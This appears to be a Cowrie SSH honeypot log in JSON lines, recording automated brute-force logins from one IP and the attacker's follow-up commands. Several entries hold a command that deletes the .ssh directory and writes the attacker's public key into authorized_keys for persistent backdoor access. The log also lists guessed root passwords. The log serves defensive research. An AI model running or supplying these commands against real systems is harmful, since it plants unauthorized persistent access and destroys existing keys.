{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55118,"dst_ip":"1.2.3.4","dst_port":22,"session":"79a1af752e33","protocol":"ssh","message":"New connection: 217.72.205.35:55118 (1.2.3.4:22) [session: 79a1af752e33]","sensor":"my-vps","timestamp":"2025-09-09T06:21:10.401287Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:10.402340Z","src_ip":"217.72.205.35","session":"79a1af752e33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":31528,"dst_ip":"1.2.3.4","dst_port":22,"session":"7482f14804c1","protocol":"ssh","message":"New connection: 212.227.235.229:31528 (1.2.3.4:22) [session: 7482f14804c1]","sensor":"my-vps","timestamp":"2025-09-09T06:21:12.579714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:21:12.580359Z","src_ip":"212.227.235.229","session":"7482f14804c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:21:12.852797Z","src_ip":"212.227.235.229","session":"7482f14804c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35182,"dst_ip":"1.2.3.4","dst_port":22,"session":"9646fc290290","protocol":"ssh","message":"New connection: 212.227.235.229:35182 (1.2.3.4:22) [session: 9646fc290290]","sensor":"my-vps","timestamp":"2025-09-09T06:21:13.359471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:21:13.365028Z","src_ip":"212.227.235.229","session":"9646fc290290"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:21:13.534808Z","src_ip":"212.227.235.229","session":"9646fc290290"}
{"eventid":"cowrie.login.success","username":"root","password":"PA$$WORD@2020","message":"login attempt [root/PA$$WORD@2020] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:21:13.983870Z","src_ip":"212.227.235.229","session":"7482f14804c1"}
{"eventid":"cowrie.login.success","username":"root","password":"asdf!234","message":"login attempt [root/asdf!234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:21:14.224213Z","src_ip":"212.227.235.229","session":"9646fc290290"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:21:14.547957Z","src_ip":"212.227.235.229","session":"7482f14804c1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:21:14.548605Z","src_ip":"212.227.235.229","session":"7482f14804c1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:21:14.549483Z","src_ip":"212.227.235.229","session":"7482f14804c1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:21:14.630388Z","src_ip":"212.227.235.229","session":"9646fc290290"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:21:14.631136Z","src_ip":"212.227.235.229","session":"9646fc290290"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:21:14.632429Z","src_ip":"212.227.235.229","session":"9646fc290290"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:14.823108Z","src_ip":"212.227.235.229","session":"7482f14804c1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:14.980260Z","src_ip":"212.227.235.229","session":"9646fc290290"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:21:15.219023Z","src_ip":"212.227.235.229","session":"9646fc290290"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:21:15.219857Z","src_ip":"212.227.235.229","session":"9646fc290290"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:21:15.399121Z","src_ip":"212.227.235.229","session":"9646fc290290"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:15.400013Z","src_ip":"212.227.235.229","session":"9646fc290290"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:21:15.425255Z","src_ip":"212.227.235.229","session":"7482f14804c1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:21:15.425951Z","src_ip":"212.227.235.229","session":"7482f14804c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35868,"dst_ip":"1.2.3.4","dst_port":22,"session":"3338ee6b5206","protocol":"ssh","message":"New connection: 212.227.235.229:35868 (1.2.3.4:22) [session: 3338ee6b5206]","sensor":"my-vps","timestamp":"2025-09-09T06:21:15.578713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:21:15.584748Z","src_ip":"212.227.235.229","session":"3338ee6b5206"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:21:15.700540Z","src_ip":"212.227.235.229","session":"7482f14804c1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:15.701379Z","src_ip":"212.227.235.229","session":"7482f14804c1"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:21:15.758348Z","src_ip":"212.227.235.229","session":"3338ee6b5206"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":31529,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ffd47b96187","protocol":"ssh","message":"New connection: 212.227.235.229:31529 (1.2.3.4:22) [session: 3ffd47b96187]","sensor":"my-vps","timestamp":"2025-09-09T06:21:15.971939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:21:15.972998Z","src_ip":"212.227.235.229","session":"3ffd47b96187"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:21:16.244543Z","src_ip":"212.227.235.229","session":"3ffd47b96187"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37435,"dst_ip":"1.2.3.4","dst_port":22,"session":"de904d5aa016","protocol":"ssh","message":"New connection: 212.227.235.229:37435 (1.2.3.4:22) [session: de904d5aa016]","sensor":"my-vps","timestamp":"2025-09-09T06:21:16.416995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:21:16.418153Z","src_ip":"212.227.235.229","session":"de904d5aa016"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:21:16.464239Z","src_ip":"212.227.235.229","session":"3338ee6b5206"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:21:16.484038Z","src_ip":"212.227.235.229","session":"de904d5aa016"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"123456","message":"login attempt [gpadmin/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T06:21:16.789553Z","src_ip":"212.227.235.229","session":"de904d5aa016"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:21:17.372243Z","src_ip":"212.227.235.229","session":"3ffd47b96187"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:17.647303Z","src_ip":"212.227.235.229","session":"3338ee6b5206"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36488,"dst_ip":"1.2.3.4","dst_port":22,"session":"32e7b9c4b827","protocol":"ssh","message":"New connection: 212.227.235.229:36488 (1.2.3.4:22) [session: 32e7b9c4b827]","sensor":"my-vps","timestamp":"2025-09-09T06:21:17.822058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:21:17.830848Z","src_ip":"212.227.235.229","session":"32e7b9c4b827"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:17.857247Z","src_ip":"212.227.235.229","session":"de904d5aa016"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:21:18.006038Z","src_ip":"212.227.235.229","session":"32e7b9c4b827"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:18.645644Z","src_ip":"212.227.235.229","session":"3ffd47b96187"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:21:18.724275Z","src_ip":"212.227.235.229","session":"32e7b9c4b827"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:18.904826Z","src_ip":"212.227.235.229","session":"9646fc290290"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:18.910879Z","src_ip":"212.227.235.229","session":"32e7b9c4b827"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":31530,"dst_ip":"1.2.3.4","dst_port":22,"session":"35f10ce64504","protocol":"ssh","message":"New connection: 212.227.235.229:31530 (1.2.3.4:22) [session: 35f10ce64504]","sensor":"my-vps","timestamp":"2025-09-09T06:21:18.915241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:21:18.915820Z","src_ip":"212.227.235.229","session":"35f10ce64504"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:21:19.186563Z","src_ip":"212.227.235.229","session":"35f10ce64504"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:21:20.308709Z","src_ip":"212.227.235.229","session":"35f10ce64504"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:20.581544Z","src_ip":"212.227.235.229","session":"35f10ce64504"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:20.582635Z","src_ip":"212.227.235.229","session":"7482f14804c1"}
